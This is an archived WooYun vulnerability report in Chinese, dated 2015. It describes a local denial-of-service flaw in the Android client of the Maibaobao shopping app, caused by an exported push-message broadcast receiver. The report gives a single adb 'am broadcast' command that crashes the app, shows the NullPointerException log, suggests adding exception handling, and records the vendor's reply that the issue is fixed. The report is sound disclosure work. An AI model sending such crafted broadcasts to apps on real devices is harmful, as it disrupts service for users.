{"id": 36508, "wybug_id": "wooyun-2015-0101700", "wybug_title": "麦包包客户端存在本地拒绝服务攻击", "wybug_corp": "麦包包", "wybug_author": "深度安全实验室", "wybug_date": "2015-03-16 16:24", "wybug_open_date": "2015-06-15 10:18", "wybug_type": "拒绝服务", "wybug_level": "高", "wybug_rank_0": "20", "wybug_status": "厂商已经确认", "wybug_from": "http://www.wooyun.org", "wybug_tags": "", "wybug_detail": "漏洞详情 披露状态：   \t\t\t\t\t\t\t\t\t2015-03-16：\t细节已通知厂商并且等待厂商处理中\t\t\t\t\t\t\t\t\t2015-03-17：\t厂商已经确认，细节仅向厂商公开\t\t\t\t\t\t\t\t\t2015-03-20：\t细节向第三方安全合作伙伴开放\t\t\t\t\t\t\t\t\t2015-05-11：\t细节向核心白帽子及相关领域专家公开\t\t\t\t\t\t\t\t\t2015-05-21：\t细节向普通白帽子公开\t\t\t\t\t\t\t\t\t2015-05-31：\t细节向实习白帽子公开\t\t\t\t\t\t\t\t\t2015-06-15：\t细节向公众公开  简要描述： 麦包包存在本地拒绝服务攻击，导致客户端进程崩溃apk的相关信息：所有者:CN=yek, OU=yek, O=yek, L=shanghai, ST=shanghai, C=cn签发人:CN=yek, OU=yek, O=yek, L=shanghai, ST=shanghai, C=cn序列号:4e2006e9有效期: Fri Jul 15 17:22:49 CST 2011 至Sun Jun 21 17:22:49 CST 2111证书指纹:         MD5:39:3F:AD:78:B6:A8:80:EE:AD:5F:0B:36:02:B2:B5:43         SHA1:E1:1E:D4:F5:7A:D0:9B:9A:7B:91:70:E2:B9:F9:06:49:78:5A:50:FD         签名算法名称:SHA1withRSA         版本: 3 详细说明：  android版麦包包客户端，配置文件AndroidManifest.xml中定义的receiver组件对外暴露，其他应用程序可发起恶意广播使应用进程崩溃。应用下载地址：http://shouji.baidu.com/soft/item?docid=7550690&from=web_alad_6\n\n   漏洞证明：  1.客户端基本信息应用包名：com.yek.android.mbaobao，麦包包版本：3.522.漏洞证明AndroidManifest.xml文件中定义的receiver组com.mbaobao.push.PushMessageReceiver对外暴露：\n\n在adb shell下运行am指令，模拟发送广播：\nroot@ZTE-S2015:/ # am broadcast -n com.yek.android.mbaobao/com.mbaobao.push.PushMessageReceiver\n\n\n发送消息后应用进程崩溃，应用停止运行：\n\nlog信息，空指针异常：\n03-16 11:05:14.031: E/AndroidRuntime(14230): FATAL EXCEPTION: main03-16 11:05:14.031: E/AndroidRuntime(14230): Process: com.yek.android.mbaobao, PID: 1423003-16 11:05:14.031: E/AndroidRuntime(14230): java.lang.RuntimeException: Unable to start receiver com.mbaobao.push.PushMessageReceiver: java.lang.NullPointerException03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.app.ActivityThread.handleReceiver(ActivityThread.java:2417)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.app.ActivityThread.access$1700(ActivityThread.java:138)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1275)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.os.Handler.dispatchMessage(Handler.java:102)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.os.Looper.loop(Looper.java:136)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.app.ActivityThread.main(ActivityThread.java:5095)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat java.lang.reflect.Method.invokeNative(Native Method)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat java.lang.reflect.Method.invoke(Method.java:515)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:786)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:602)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat de.robv.android.xposed.XposedBridge.main(XposedBridge.java:136)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat dalvik.system.NativeStart.main(Native Method)03-16 11:05:14.031: E/AndroidRuntime(14230): Caused by: java.lang.NullPointerException03-16 11:05:14.031: E/AndroidRuntime(14230): \tat com.baidu.frontia.api.FrontiaPushMessageReceiver.onReceive(Unknown Source)03-16 11:05:14.031: E/AndroidRuntime(14230): \tat android.app.ActivityThread.handleReceiver(ActivityThread.java:2410)03-16 11:05:14.031: E/AndroidRuntime(14230): \t... 11 more\n   修复方案：  针对异常增加异常处理   版权声明：转载请注明来源 深度安全实验室@乌云\n ", "wybug_reply": "漏洞回应  厂商回应： 危害等级：中 漏洞Rank：10  确认时间：2015-03-17 10:16 厂商回复： 这个bug不严重，作者是在root上进行。该模式下已经可以得到所有app的资料了。另外这种攻击行为代价较高。需要客户端安装第三方程序，而且是为了专门黑我们的客户端。 最新状态： 2015-03-18：已修复！  ", "replys": "漏洞评价：\n评论\n  \n\n\n", "wybug_level_fromcorp": "中", "wybug_rank_fromcorp": 10, "Ranks": null}